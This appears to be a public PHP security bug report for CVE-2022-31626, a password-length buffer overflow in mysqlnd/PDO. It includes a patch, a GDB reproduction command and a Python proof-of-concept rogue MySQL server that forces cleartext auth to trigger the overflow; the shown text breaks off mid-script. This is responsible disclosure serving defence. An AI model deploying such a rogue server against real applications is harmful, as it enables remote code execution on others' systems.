Headline
CVE-2022-31626: mysqlnd/pdo password buffer overflow leading to RCE
In PHP versions 7.4.x below 7.4.30, 8.0.x below 8.0.20, and 8.1.x below 8.1.7, when pdo_mysql extension with mysqlnd driver, if the third party is allowed to supply host to connect to and the password for the connection, password of excessive length can trigger a buffer overflow in PHP, which can lead to a remote code execution vulnerability.
Sec Bug #81719
mysqlnd/pdo password buffer overflow leading to RCE
Submitted:
2022-05-16 14:33 UTC
Modified:
2022-06-15 07:24 UTC
Votes:
11
Avg. Score:
3.0 ± 1.0
Reproduced:
2 of 2 (100.0%)
Same Version:
2 (100.0%)
Same OS:
2 (100.0%)
From:
c dot fol at ambionics dot io
Assigned:
cmb (profile)
Status:
Closed
Package:
PDO MySQL
PHP Version:
8.1.6
OS:
Private report:
No
CVE-ID:
2022-31626
[2022-05-16 14:33 UTC] c dot fol at ambionics dot io
Description:
Hello PHP team!
INFOS
There’s a buffer overflow here: https://github.com/php/php-src/blob/master/ext/mysqlnd/mysqlnd_wireprotocol.c#L785
It copies `auth_data_len` bytes from `buffer + MYSQLND_HEADER_SIZE`, but only allocates `auth_data_len` bytes.
This bug affects mysqlnd and therefore PDO.
For context, this function copies the user submitted password (`packet->auth_data`) to a buffer in order to send it to a MySQL server. This happens with the legacy auth method that requires you to send a password as raw instead of having some kind of challenge/response logic.
This is exploitable remotely by making PHP connect to a rogue MySQL server. Tools such as Adminer, PHPmyAdmin are affected. Impact is remote code execution.
TEST SCRIPT
I’ve added a fake MySQL Server coded in python to demonstrate the bug at the bottom of this bug report. This should probably be removed before the bug goes public.
Install pwntools (https://github.com/Gallopsled/pwntools#readme), and start it. It’ll wait for connections. Then, you can start PHP in debug mode, with GDB and break on the indicated line:
``` $ gdb --args ./sapi/cli/php -r “new PDO('mysql:host=here.localhost’, 'b’, str_repeat('a’,5000));” (gdb) b mysqlnd_wireprotocol.c:785 (gdb) r ```
As it breaks, you’ll see that the copy happens OOB.
PATCH
Just add the size of the header in the computation.
```
- zend_uchar * const buffer = pfc->cmd_buffer.length >= packet->auth_data_len? pfc->cmd_buffer.buffer : mnd_emalloc(packet->auth_data_len);
- size_t total_packet_size = packet->auth_data_len + MYSQLND_HEADER_SIZE;
- zend_uchar * const buffer = pfc->cmd_buffer.length >= total_packet_size? pfc->cmd_buffer.buffer : mnd_emalloc(total_packet_size); ```
Best regards, Charles Fol ambionics.io
``` #!/usr/bin/env python3
from pwn import *
class ProtoError(Exception): def __init__(self): super().__init__(‘Unknown SQL command’)
class Output: def clear(self): print(‘\r\x1b[K’, end=’’) return self
def \_\_getattr\_\_(self, x):
def wrapper(msg='', \*args, \*\*kwargs):
return print(msg.format(\*args), \*\*kwargs)
return wrapper
out = Output()
def failure(message): out.error(message) exit()
def zend_string_size(s): """When you create a PHP string of N bytes, it will allocate N+25 bytes. “"” return s - 24 - 1
class Handler: """Handles a connection to the fake MySQL server. When the client auths, we change the authentication method to cleartext to trigger the overflow. Otherwise, once we receive a packet, we send back what the client wants to hear. “"” def __init__(self, socket): self.socket = socket self.handle()
def die(self):
self.socket.close()
def handle(self):
try:
self.handle\_handshake()
while self.handle\_command() != 'quit':
pass
except ProtoError:
raise
except EOFError:
#out.failure('EOF')
pass
except Exception as e:
#out.failure('{}: {:}', type(e).\_\_name\_\_, str(e))
raise
finally:
self.socket.close()
def handle\_command(self):
packet = self.read\_packet()
command = packet\[0\]
# Send query
if command == 0x03:
self.handle\_query(packet\[1:\])
return
# Change DB
if command == 0x02:
#out.info('Change DB: {}', packet\[1:\].decode())
self.send('07 00 00 01 00 00 00 02 00 00 00')
return
if command == 0x1b:
#out.info('Unknown packet')
self.send('05 00 00 01 fe 00 00 02 00')
return
# Quit
if command == 0x01:
#out.info('Closing connection')
return 'quit'
def send(self, data):
self.socket.send(bytes.fromhex(data.replace(' ', '')))
def read\_packet(self):
packet\_header = self.socket.recv(4)
if len(packet\_header) != 4:
raise ProtoError()
size = u32(packet\_header) & 0xffffff
contents = self.socket.recv(size)
return contents
def handle\_handshake(self):
#out.success('Got connection, authenticating...')
self.send('4a0000000a382e302e3233009a0e000011686652356c700800ffffff0200ffcf150000000000000000000077315b77715b5315523a274e0063616368696e675f736861325f70617373776f726400')
self.read\_packet()
self.send('020000020103')
# switch auth to cleartext password (pam)
self.send('16000003FE6d7973716c5f636c6561725f70617373776f726400')
self.read\_packet()
self.read\_packet()
# The overflow :)
self.socket.recv(4)
self.send('0700000500000002000000')
def handle\_query(self, query):
#out.info('Query: {}', query.decode())
if query.startswith(b'SET '):
self.send('07 00 00 01 00 00 00 02 00 00 00')
elif query.startswith(b'SELECT TABLE\_NAME, TABLE\_TYPE'):
self.send('0100000102480000020364656612696e666f726d6174696f6e5f736368656d61065441424c4553067461626c65730a5441424c455f4e414d450a5441424c455f4e414d450cff0000010000fd8110000000480000030364656612696e666f726d6174696f6e5f736368656d61065441424c4553067461626c65730a5441424c455f545950450a5441424c455f545950450cff002c000000fe811100000005000004fe000002000d00000501610a42415345205441424c451000000604746573740a42415345205441424c4505000007fe00000200')
elif query.startswith(b'SELECT @@default\_storage\_engine'):
self.send('01000001012e0000020364656600000018404064656661756c745f73746f726167655f656e67696e65000cff0054550100fd00001f000005000003fe000002000700000406496e6e6f444205000005fe00000200')
elif query.startswith(b'SHOW COLLATION'):
self.send('01000001074e0000020364656612696e666f726d6174696f6e5f736368656d610a434f4c4c4154494f4e530a434f4c4c4154494f4e5309436f6c6c6174696f6e09436f6c6c6174696f6e0cff0000010000fd01100000004a0000030364656612696e666f726d6174696f6e5f736368656d610a434f4c4c4154494f4e530a434f4c4c4154494f4e53074368617273657407436861727365740cff0000010000fd0110000000400000040364656612696e666f726d6174696f6e5f736368656d610a434f4c4c4154494f4e530a434f4c4c4154494f4e530249640249640c3f00140000000821000000004a0000050364656612696e666f726d6174696f6e5f736368656d610a434f4c4c4154494f4e530a434f4c4c4154494f4e530744656661756c740744656661756c740cff000c000000fd01000000004c0000060364656612696e666f726d6174696f6e5f736368656d610a434f4c4c4154494f4e530a434f4c4c4154494f4e5308436f6d70696c656408436f6d70696c65640cff000c000000fd01000000004a0000070364656612696e666f726d6174696f6e5f736368656d610a434f4c4c4154494f4e530a434f4c4c4154494f4e5307536f72746c656e07536f72746c656e0c3f000a000000032110000000560000080364656612696e666f726d6174696f6e5f736368656d610a434f4c4c4154494f4e530a434f4c4c4154494f4e530d5061645f6174747269627574650d5061645f6174747269627574650cff0024000000fe811100000005000009fe000022002a00000a0c61726d73636969385f62696e0861726d736369693802363400035965730131095041442053504143453400000b1361726d73636969385f67656e6572616c5f63690861726d736369693802333203596573035965730131095041442053504143452400000c0961736369695f62696e05617363696902363500035965730131095041442053504143452e00000d1061736369695f67656e6572616c5f636905617363696902313103596573035965730131095041442053504143452200000e08626967355f62696e046269673502383400035965730131095041442053504143452b00000f0f626967355f6368696e6573655f6369046269673501310359657303596573013109504144205350414345220000100662696e6172790662696e61727902363303596573035965730131064e4f20504144260000110a6370313235305f62696e0663703132353002363600035965730131095041442053504143452e000012126370313235305f63726f617469616e5f63690663703132353002343400035965730131095041442053504143452b0000130f6370313235305f637a6563685f637306637031323530023334000359657301320950414420535041434530000014116370313235305f67656e6572616c5f63690663703132353002323603596573035965730131095041442053504143452c000015106370313235305f706f6c6973685f6369066370313235300239390003596573013109504144205350414345260000160a6370313235315f62696e0663703132353102353000035965730131095041442053504143452f000017136370313235315f62756c67617269616e5f636906637031323531023134000359657301310950414420535041434530000018116370313235315f67656e6572616c5f63690663703132353102353103596573035965730131095041442053504143452d000019116370313235315f67656e6572616c5f63730663703132353102353200035965730131095041442053504143452f00001a136370313235315f756b7261696e69616e5f63690663703132353102323300035965730131095041442053504143452600001b0a6370313235365f62696e0663703132353602363700035965730131095041442053504143453000001c116370313235365f67656e6572616c5f63690663703132353602353703596573035965730131095041442053504143452600001d0a6370313235375f62696e0663703132353702353800035965730131095041442053504143453000001e116370313235375f67656e6572616c5f63690663703132353702353903596573035965730131095041442053504143453000001f146370313235375f6c69746875616e69616e5f6369066370313235370232390003596573013109504144205350414345240000200963703835305f62696e05637038353002383000035965730131095041442053504143452d0000211063703835305f67656e6572616c5f636905637038353001340359657303596573013109504144205350414345240000220963703835325f62696e05637038353202383100035965730131095041442053504143452e0000231063703835325f67656e6572616c5f63690563703835320234300359657303596573013109504144205350414345240000240963703836365f62696e05637038363602363800035965730131095041442053504143452e0000251063703836365f67656e6572616c5f63690563703836360233360359657303596573013109504144205350414345240000260963703933325f62696e05637039333202393600035965730131095041442053504143452f0000271163703933325f6a6170616e6573655f636905637039333202393503596573035965730131095041442053504143452200002808646563385f62696e046465633802363900035965730131095041442053504143452b0000290f646563385f737765646973685f63690464656338013303596573035965730131095041442053504143452800002a0b6575636a706d735f62696e076575636a706d7302393800035965730131095041442053504143453300002b136575636a706d735f6a6170616e6573655f6369076575636a706d7302393703596573035965730131095041442053504143452400002c096575636b725f62696e056575636b7202383500035965730131095041442053504143452d00002d0f6575636b725f6b6f7265616e5f6369056575636b7202313903596573035965730131095041442053504143452900002e0b676231383033305f62696e07676231383033300332343900035965730131095041442053504143453300002f12676231383033305f6368696e6573655f636907676231383033300332343803596573035965730132095041442053504143453400003016676231383033305f756e69636f64655f3532305f63690767623138303330033235300003596573013809504144205350414345260000310a6762323331325f62696e06676232333132023836000359657301310950414420535041434530000032116762323331325f6368696e6573655f6369066762323331320232340359657303596573013109504144205350414345200000330767626b5f62696e0367626b02383700035965730131095041442053504143452a0000340e67626b5f6368696e6573655f63690367626b0232380359657303596573013109504144205350414345280000350b67656f737464385f62696e0767656f737464380239330003596573013109504144205350414345320000361267656f737464385f67656e6572616c5f63690767656f7374643802393203596573035965730131095041442053504143452400003709677265656b5f62696e05677265656b02373000035965730131095041442053504143452e00003810677265656b5f67656e6572616c5f636905677265656b0232350359657303596573013109504144205350414345260000390a6865627265775f62696e0668656272657702373100035965730131095041442053504143453000003a116865627265775f67656e6572616c5f63690668656272657702313603596573035965730131095041442053504143452000003b076870385f62696e0368703802373200035965730131095041442053504143452900003c0e6870385f656e676c6973685f636903687038013603596573035965730131095041442053504143452800003d0b6b6579626373325f62696e076b65796263733202373300035965730131095041442053504143453200003e126b6579626373325f67656e6572616c5f6369076b65796263733202333703596573035965730131095041442053504143452400003f096b6f6938725f62696e056b6f69387202373400035965730131095041442053504143452d000040106b6f6938725f67656e6572616c5f6369056b6f6938720137035965730359657301310950414420535041434524000041096b6f6938755f62696e056b6f69387502373500035965730131095041442053504143452e000042106b6f6938755f67656e6572616c5f6369056b6f6938750232320359657303596573013109504144205350414345260000430a6c6174696e315f62696e066c6174696e3102343700035965730131095041442053504143452c000044106c6174696e315f64616e6973685f6369066c6174696e3102313500035965730131095041442053504143452d000045116c6174696e315f67656e6572616c5f6369066c6174696e3102343800035965730131095041442053504143452d000046116c6174696e315f67656e6572616c5f6373066c6174696e3102343900035965730131095041442053504143452c000047116c6174696e315f6765726d616e315f6369066c6174696e31013500035965730131095041442053504143452d000048116c6174696e315f6765726d616e325f6369066c6174696e3102333100035965730132095041442053504143452d000049116c6174696e315f7370616e6973685f6369066c6174696e3102393400035965730131095041442053504143452f00004a116c6174696e315f737765646973685f6369066c6174696e31013803596573035965730131095041442053504143452600004b0a6c6174696e325f62696e066c6174696e3202373700035965730131095041442053504143452e00004c126c6174696e325f63726f617469616e5f6369066c6174696e3202323700035965730131095041442053504143452a00004d0f6c6174696e325f637a6563685f6373066c6174696e32013200035965730134095041442053504143452f00004e116c6174696e325f67656e6572616c5f6369066c6174696e32013903596573035965730131095041442053504143452f00004f136c6174696e325f68756e67617269616e5f6369066c6174696e320232310003596573013109504144205350414345260000500a6c6174696e355f62696e066c6174696e35023738000359657301310950414420535041434530000051116c6174696e355f7475726b6973685f6369066c6174696e350233300359657303596573013109504144205350414345260000520a6c6174696e375f62696e066c6174696e3702373900035965730131095041442053504143452e000053126c6174696e375f6573746f6e69616e5f6373066c6174696e37023230000359657301310950414420535041434530000054116c6174696e375f67656e6572616c5f6369066c6174696e3702343103596573035965730131095041442053504143452d000055116c6174696e375f67656e6572616c5f6373066c6174696e37023432000359657301310950414420535041434524000056096d616363655f62696e056d6163636502343300035965730131095041442053504143452e000057106d616363655f67656e6572616c5f6369056d6163636502333803596573035965730131095041442053504143452a0000580c6d6163726f6d616e5f62696e086d6163726f6d616e023533000359657301310950414420535041434534000059136d6163726f6d616e5f67656e6572616c5f6369086d6163726f6d616e02333903596573035965730131095041442053504143452200005a08736a69735f62696e04736a697302383800035965730131095041442053504143452d00005b10736a69735f6a6170616e6573655f636904736a697302313303596573035965730131095041442053504143452200005c08737765375f62696e047377653702383200035965730131095041442053504143452c00005d0f737765375f737765646973685f6369047377653702313003596573035965730131095041442053504143452600005e0a7469733632305f62696e0674697336323002383900035965730131095041442053504143452d00005f0e7469733632305f746861695f63690674697336323002313803596573035965730134095041442053504143452200006008756373325f62696e047563733202393000035965730131095041442053504143452b00006110756373325f63726f617469616e5f63690475637332033134390003596573013809504144205350414345280000620d756373325f637a6563685f63690475637332033133380003596573013809504144205350414345290000630e756373325f64616e6973685f636904756373320331333900035965730138095041442053504143452c00006411756373325f6573706572616e746f5f636904756373320331343500035965730138095041442053504143452b00006510756373325f6573746f6e69616e5f636904756373320331333400035965730138095041442053504143452c0000660f756373325f67656e6572616c5f6369047563733202333503596573035965730131095041442053504143453300006718756373325f67656e6572616c5f6d7973716c3530305f636904756373320331353900035965730131095041442053504143452a0000680f756373325f6765726d616e325f636904756373320331343800035965730138095041442053504143452c00006911756373325f68756e67617269616e5f636904756373320331343600035965730138095041442053504143452c00006a11756373325f6963656c616e6469635f636904756373320331323900035965730138095041442053504143452a00006b0f756373325f6c61747669616e5f636904756373320331333000035965730138095041442053504143452d00006c12756373325f6c69746875616e69616e5f636904756373320331343000035965730138095041442053504143452a00006d0f756373325f7065727369616e5f636904756373320331343400035965730138095041442053504143452900006e0e756373325f706f6c6973685f636904756373320331333300035965730138095041442053504143452b00006f10756373325f726f6d616e69616e5f63690475637332033133310003596573013809504144205350414345280000700d756373325f726f6d616e5f636904756373320331343300035965730138095041442053504143452a0000710f756373325f73696e68616c615f63690475637332033134370003596573013809504144205350414345290000720e756373325f736c6f76616b5f636904756373320331343100035965730138095041442053504143452c00007311756373325f736c6f76656e69616e5f636904756373320331333200035965730138095041442053504143452b00007410756373325f7370616e697368325f636904756373320331343200035965730138095041442053504143452a0000750f756373325f7370616e6973685f636904756373320331333500035965730138095041442053504143452a0000760f756373325f737765646973685f636904756373320331333600035965730138095041442053504143452a0000770f756373325f7475726b6973685f636904756373320331333700035965730138095041442053504143452e00007813756373325f756e69636f64655f3532305f636904756373320331353000035965730138095041442053504143452a0000790f756373325f756e69636f64655f636904756373320331323800035965730138095041442053504143452d00007a12756373325f766965746e616d6573655f636904756373320331353100035965730138095041442053504143452200007b08756a69735f62696e04756a697302393100035965730131095041442053504143452d00007c10756a69735f6a6170616e6573655f636904756a697302313203596573035965730131095041442053504143452800007d0b75746631366c655f62696e0775746631366c6502363200035965730131095041442053504143453200007e1275746631366c655f67656e6572616c5f63690775746631366c6502353603596573035965730131095041442053504143452400007f0975746631365f62696e05757466313602353500035965730131095041442053504143452d0000801175746631365f63726f617469616e5f63690575746631360331323200035965730138095041442053504143452a0000810e75746631365f637a6563685f63690575746631360331313100035965730138095041442053504143452b0000820f75746631365f64616e6973685f63690575746631360331313200035965730138095041442053504143452e0000831275746631365f6573706572616e746f5f63690575746631360331313800035965730138095041442053504143452d0000841175746631365f6573746f6e69616e5f63690575746631360331303700035965730138095041442053504143452e0000851075746631365f67656e6572616c5f636905757466313602353403596573035965730131095041442053504143452c0000861075746631365f6765726d616e325f63690575746631360331323100035965730138095041442053504143452e0000871275746631365f68756e67617269616e5f63690575746631360331313900035965730138095041442053504143452e0000881275746631365f6963656c616e6469635f63690575746631360331303200035965730138095041442053504143452c0000891075746631365f6c61747669616e5f63690575746631360331303300035965730138095041442053504143452f00008a1375746631365f6c69746875616e69616e5f63690575746631360331313300035965730138095041442053504143452c00008b1075746631365f7065727369616e5f63690575746631360331313700035965730138095041442053504143452b00008c0f75746631365f706f6c6973685f63690575746631360331303600035965730138095041442053504143452d00008d1175746631365f726f6d616e69616e5f63690575746631360331303400035965730138095041442053504143452a00008e0e75746631365f726f6d616e5f63690575746631360331313600035965730138095041442053504143452c00008f1075746631365f73696e68616c615f63690575746631360331323000035965730138095041442053504143452b0000900f75746631365f736c6f76616b5f63690575746631360331313400035965730138095041442053504143452e0000911275746631365f736c6f76656e69616e5f63690575746631360331303500035965730138095041442053504143452d0000921175746631365f7370616e697368325f63690575746631360331313500035965730138095041442053504143452c0000931075746631365f7370616e6973685f63690575746631360331303800035965730138095041442053504143452c0000941075746631365f737765646973685f63690575746631360331303900035965730138095041442053504143452c0000951075746631365f7475726b6973685f6369057574663136033131300003596573013809504144205350414345300000961475746631365f756e69636f64655f3532305f63690575746631360331323300035965730138095041442053504143452c0000971075746631365f756e69636f64655f63690575746631360331303100035965730138095041442053504143452f0000981375746631')
self.send('365f766965746e616d6573655f6369057574663136033132340003596573013809504144205350414345240000990975746633325f62696e05757466333202363100035965730131095041442053504143452d00009a1175746633325f63726f617469616e5f63690575746633320331383100035965730138095041442053504143452a00009b0e75746633325f637a6563685f63690575746633320331373000035965730138095041442053504143452b00009c0f75746633325f64616e6973685f63690575746633320331373100035965730138095041442053504143452e00009d1275746633325f6573706572616e746f5f63690575746633320331373700035965730138095041442053504143452d00009e1175746633325f6573746f6e69616e5f63690575746633320331363600035965730138095041442053504143452e00009f1075746633325f67656e6572616c5f636905757466333202363003596573035965730131095041442053504143452c0000a01075746633325f6765726d616e325f63690575746633320331383000035965730138095041442053504143452e0000a11275746633325f68756e67617269616e5f63690575746633320331373800035965730138095041442053504143452e0000a21275746633325f6963656c616e6469635f63690575746633320331363100035965730138095041442053504143452c0000a31075746633325f6c61747669616e5f63690575746633320331363200035965730138095041442053504143452f0000a41375746633325f6c69746875616e69616e5f63690575746633320331373200035965730138095041442053504143452c0000a51075746633325f7065727369616e5f63690575746633320331373600035965730138095041442053504143452b0000a60f75746633325f706f6c6973685f63690575746633320331363500035965730138095041442053504143452d0000a71175746633325f726f6d616e69616e5f63690575746633320331363300035965730138095041442053504143452a0000a80e75746633325f726f6d616e5f63690575746633320331373500035965730138095041442053504143452c0000a91075746633325f73696e68616c615f63690575746633320331373900035965730138095041442053504143452b0000aa0f75746633325f736c6f76616b5f63690575746633320331373300035965730138095041442053504143452e0000ab1275746633325f736c6f76656e69616e5f63690575746633320331363400035965730138095041442053504143452d0000ac1175746633325f7370616e697368325f63690575746633320331373400035965730138095041442053504143452c0000ad1075746633325f7370616e6973685f63690575746633320331363700035965730138095041442053504143452c0000ae1075746633325f737765646973685f63690575746633320331363800035965730138095041442053504143452c0000af1075746633325f7475726b6973685f6369057574663332033136390003596573013809504144205350414345300000b01475746633325f756e69636f64655f3532305f63690575746633320331383200035965730138095041442053504143452c0000b11075746633325f756e69636f64655f63690575746633320331363000035965730138095041442053504143452f0000b21375746633325f766965746e616d6573655f6369057574663332033138330003596573013809504144205350414345300000b312757466386d62345f303930305f61695f636907757466386d62340332353503596573035965730130064e4f205041442d0000b412757466386d62345f303930305f61735f636907757466386d62340333303500035965730130064e4f205041442d0000b512757466386d62345f303930305f61735f637307757466386d62340332373800035965730130064e4f205041442b0000b610757466386d62345f303930305f62696e07757466386d62340333303900035965730131064e4f20504144280000b70b757466386d62345f62696e07757466386d62340234360003596573013109504144205350414345310000b813757466386d62345f63726f617469616e5f636907757466386d6234033234350003596573013809504144205350414345300000b915757466386d62345f63735f303930305f61695f636907757466386d62340332363600035965730130064e4f20504144300000ba15757466386d62345f63735f303930305f61735f637307757466386d62340332383900035965730130064e4f205041442e0000bb10757466386d62345f637a6563685f636907757466386d62340332333400035965730138095041442053504143452f0000bc11757466386d62345f64616e6973685f636907757466386d6234033233350003596573013809504144205350414345300000bd15757466386d62345f64615f303930305f61695f636907757466386d62340332363700035965730130064e4f20504144300000be15757466386d62345f64615f303930305f61735f637307757466386d62340332393000035965730130064e4f20504144330000bf18757466386d62345f64655f70625f303930305f61695f636907757466386d62340332353600035965730130064e4f20504144330000c018757466386d62345f64655f70625f303930305f61735f637307757466386d62340332373900035965730130064e4f20504144300000c115757466386d62345f656f5f303930305f61695f636907757466386d62340332373300035965730130064e4f20504144300000c215757466386d62345f656f5f303930305f61735f637307757466386d62340332393600035965730130064e4f20504144320000c314757466386d62345f6573706572616e746f5f636907757466386d6234033234310003596573013809504144205350414345310000c413757466386d62345f6573746f6e69616e5f636907757466386d6234033233300003596573013809504144205350414345300000c515757466386d62345f65735f303930305f61695f636907757466386d62340332363300035965730130064e4f20504144300000c615757466386d62345f65735f303930305f61735f637307757466386d62340332383600035965730130064e4f20504144350000c71a757466386d62345f65735f747261645f303930305f61695f636907757466386d62340332373000035965730130064e4f20504144350000c81a757466386d62345f65735f747261645f303930305f61735f637307757466386d62340332393300035965730130064e4f20504144300000c915757466386d62345f65745f303930305f61695f636907757466386d62340332363200035965730130064e4f20504144300000ca15757466386d62345f65745f303930305f61735f637307757466386d62340332383500035965730130064e4f205041442f0000cb12757466386d62345f67656e6572616c5f636907757466386d62340234350003596573013109504144205350414345300000cc12757466386d62345f6765726d616e325f636907757466386d6234033234340003596573013809504144205350414345300000cd15757466386d62345f68725f303930305f61695f636907757466386d62340332373500035965730130064e4f20504144300000ce15757466386d62345f68725f303930305f61735f637307757466386d62340332393800035965730130064e4f20504144320000cf14757466386d62345f68756e67617269616e5f636907757466386d6234033234320003596573013809504144205350414345300000d015757466386d62345f68755f303930305f61695f636907757466386d62340332373400035965730130064e4f20504144300000d115757466386d62345f68755f303930305f61735f637307757466386d62340332393700035965730130064e4f20504144320000d214757466386d62345f6963656c616e6469635f636907757466386d6234033232350003596573013809504144205350414345300000d315757466386d62345f69735f303930305f61695f636907757466386d62340332353700035965730130064e4f20504144300000d415757466386d62345f69735f303930305f61735f637307757466386d62340332383000035965730130064e4f20504144300000d515757466386d62345f6a615f303930305f61735f637307757466386d62340333303300035965730130064e4f20504144340000d618757466386d62345f6a615f303930305f61735f63735f6b7307757466386d6234033330340003596573023234064e4f20504144300000d712757466386d62345f6c61747669616e5f636907757466386d6234033232360003596573013809504144205350414345300000d815757466386d62345f6c615f303930305f61695f636907757466386d62340332373100035965730130064e4f20504144300000d915757466386d62345f6c615f303930305f61735f637307757466386d62340332393400035965730130064e4f20504144330000da15757466386d62345f6c69746875616e69616e5f636907757466386d6234033233360003596573013809504144205350414345300000db15757466386d62345f6c745f303930305f61695f636907757466386d62340332363800035965730130064e4f20504144300000dc15757466386d62345f6c745f303930305f61735f637307757466386d62340332393100035965730130064e4f20504144300000dd15757466386d62345f6c765f303930305f61695f636907757466386d62340332353800035965730130064e4f20504144300000de15757466386d62345f6c765f303930305f61735f637307757466386d62340332383100035965730130064e4f20504144300000df12757466386d62345f7065727369616e5f636907757466386d6234033234300003596573013809504144205350414345300000e015757466386d62345f706c5f303930305f61695f636907757466386d62340332363100035965730130064e4f20504144300000e115757466386d62345f706c5f303930305f61735f637307757466386d62340332383400035965730130064e4f205041442f0000e211757466386d62345f706f6c6973685f636907757466386d6234033232390003596573013809504144205350414345310000e313757466386d62345f726f6d616e69616e5f636907757466386d62340332323700035965730138095041442053504143452e0000e410757466386d62345f726f6d616e5f636907757466386d6234033233390003596573013809504144205350414345300000e515757466386d62345f726f5f303930305f61695f636907757466386d62340332353900035965730130064e4f20504144300000e615757466386d62345f726f5f303930305f61735f637307757466386d62340332383200035965730130064e4f20504144300000e715757466386d62345f72755f303930305f61695f636907757466386d62340333303600035965730130064e4f20504144300000e815757466386d62345f72755f303930305f61735f637307757466386d62340333303700035965730130064e4f20504144300000e912757466386d62345f73696e68616c615f636907757466386d6234033234330003596573013809504144205350414345300000ea15757466386d62345f736b5f303930305f61695f636907757466386d62340332363900035965730130064e4f20504144300000eb15757466386d62345f736b5f303930305f61735f637307757466386d62340332393200035965730130064e4f205041442f0000ec11757466386d62345f736c6f76616b5f636907757466386d6234033233370003596573013809504144205350414345320000ed14757466386d62345f736c6f76656e69616e5f636907757466386d6234033232380003596573013809504144205350414345300000ee15757466386d62345f736c5f303930305f61695f636907757466386d62340332363000035965730130064e4f20504144300000ef15757466386d62345f736c5f303930305f61735f637307757466386d62340332383300035965730130064e4f20504144310000f013757466386d62345f7370616e697368325f636907757466386d6234033233380003596573013809504144205350414345300000f112757466386d62345f7370616e6973685f636907757466386d6234033233310003596573013809504144205350414345300000f215757466386d62345f73765f303930305f61695f636907757466386d62340332363400035965730130064e4f20504144300000f315757466386d62345f73765f303930305f61735f637307757466386d62340332383700035965730130064e4f20504144300000f412757466386d62345f737765646973685f636907757466386d6234033233320003596573013809504144205350414345300000f515757466386d62345f74725f303930305f61695f636907757466386d62340332363500035965730130064e4f20504144300000f615757466386d62345f74725f303930305f61735f637307757466386d62340332383800035965730130064e4f20504144300000f712757466386d62345f7475726b6973685f636907757466386d6234033233330003596573013809504144205350414345340000f816757466386d62345f756e69636f64655f3532305f636907757466386d6234033234360003596573013809504144205350414345300000f912757466386d62345f756e69636f64655f636907757466386d6234033232340003596573013809504144205350414345330000fa15757466386d62345f766965746e616d6573655f636907757466386d6234033234370003596573013809504144205350414345300000fb15757466386d62345f76695f303930305f61695f636907757466386d62340332373700035965730130064e4f20504144300000fc15757466386d62345f76695f303930305f61735f637307757466386d62340333303000035965730130064e4f20504144300000fd15757466386d62345f7a685f303930305f61735f637307757466386d62340333303800035965730130064e4f20504144220000fe08757466385f62696e047574663802383300035965730131095041442053504143452b0000ff10757466385f63726f617469616e5f63690475746638033231330003596573013809504144205350414345280000000d757466385f637a6563685f63690475746638033230320003596573013809504144205350414345290000010e757466385f64616e6973685f636904757466380332303300035965730138095041442053504143452c00000211757466385f6573706572616e746f5f636904757466380332303900035965730138095041442053504143452b00000310757466385f6573746f6e69616e5f636904757466380331393800035965730138095041442053504143452c0000040f757466385f67656e6572616c5f6369047574663802333303596573035965730131095041442053504143453300000518757466385f67656e6572616c5f6d7973716c3530305f636904757466380332323300035965730131095041442053504143452a0000060f757466385f6765726d616e325f636904757466380332313200035965730138095041442053504143452c00000711757466385f68756e67617269616e5f636904757466380332313000035965730138095041442053504143452c00000811757466385f6963656c616e6469635f636904757466380331393300035965730138095041442053504143452a0000090f757466385f6c61747669616e5f636904757466380331393400035965730138095041442053504143452d00000a12757466385f6c69746875616e69616e5f636904757466380332303400035965730138095041442053504143452a00000b0f757466385f7065727369616e5f636904757466380332303800035965730138095041442053504143452900000c0e757466385f706f6c6973685f636904757466380331393700035965730138095041442053504143452b00000d10757466385f726f6d616e69616e5f636904757466380331393500035965730138095041442053504143452800000e0d757466385f726f6d616e5f636904757466380332303700035965730138095041442053504143452a00000f0f757466385f73696e68616c615f63690475746638033231310003596573013809504144205350414345290000100e757466385f736c6f76616b5f636904757466380332303500035965730138095041442053504143452c00001111757466385f736c6f76656e69616e5f636904757466380331393600035965730138095041442053504143452b00001210757466385f7370616e697368325f636904757466380332303600035965730138095041442053504143452a0000130f757466385f7370616e6973685f636904757466380331393900035965730138095041442053504143452a0000140f757466385f737765646973685f63690475746638033230300003596573013809504144205350414345290000150f757466385f746f6c6f7765725f6369047574663802373600035965730131095041442053504143452a0000160f757466385f7475726b6973685f636904757466380332303100035965730138095041442053504143452e00001713757466385f756e69636f64655f3532305f636904757466380332313400035965730138095041442053504143452a0000180f757466385f756e69636f64655f636904757466380331393200035965730138095041442053504143452d00001912757466385f766965746e616d6573655f636904757466380332313500035965730138095041442053504143450500001afe00002200')
elif query.startswith(b'SHOW CREATE DATABASE'):
self.send('01000001021e00000203646566000000084461746162617365000cff0000010000fd01001f000025000003036465660000000f437265617465204461746162617365000cff0000100000fd01001f000005000004fe000002008400000504746573747e43524541544520444154414241534520607465737460202f2a2134303130302044454641554c54204348415241435445522053455420757466386d623420434f4c4c41544520757466386d62345f303930305f61695f6369202a2f202f2a2138303031362044454641554c5420454e4352595054494f4e3d274e27202a2f05000006fe00000200')
elif query.startswith(b'SELECT ROUTINE\_NAME AS'):
self.send('0100000104510000020364656612696e666f726d6174696f6e5f736368656d6108524f5554494e455308524f5554494e45530d53504543494649435f4e414d450c524f5554494e455f4e414d450cff0000010000fd0150000000500000030364656612696e666f726d6174696f6e5f736368656d6108524f5554494e455308524f5554494e45530c524f5554494e455f4e414d450c524f5554494e455f4e414d450cff0000010000fd0150000000500000040364656612696e666f726d6174696f6e5f736368656d6108524f5554494e455308524f5554494e45530c524f5554494e455f545950450c524f5554494e455f545950450cff0024000000fe815100000042000005036465660008524f5554494e455308524f5554494e45530e4454445f4944454e5449464945520e4454445f4944454e5449464945520cff00f4ffff0bfc80001f000005000006fe0000020005000007fe00000200')
elif query.startswith(b'SHOW EVENTS'):
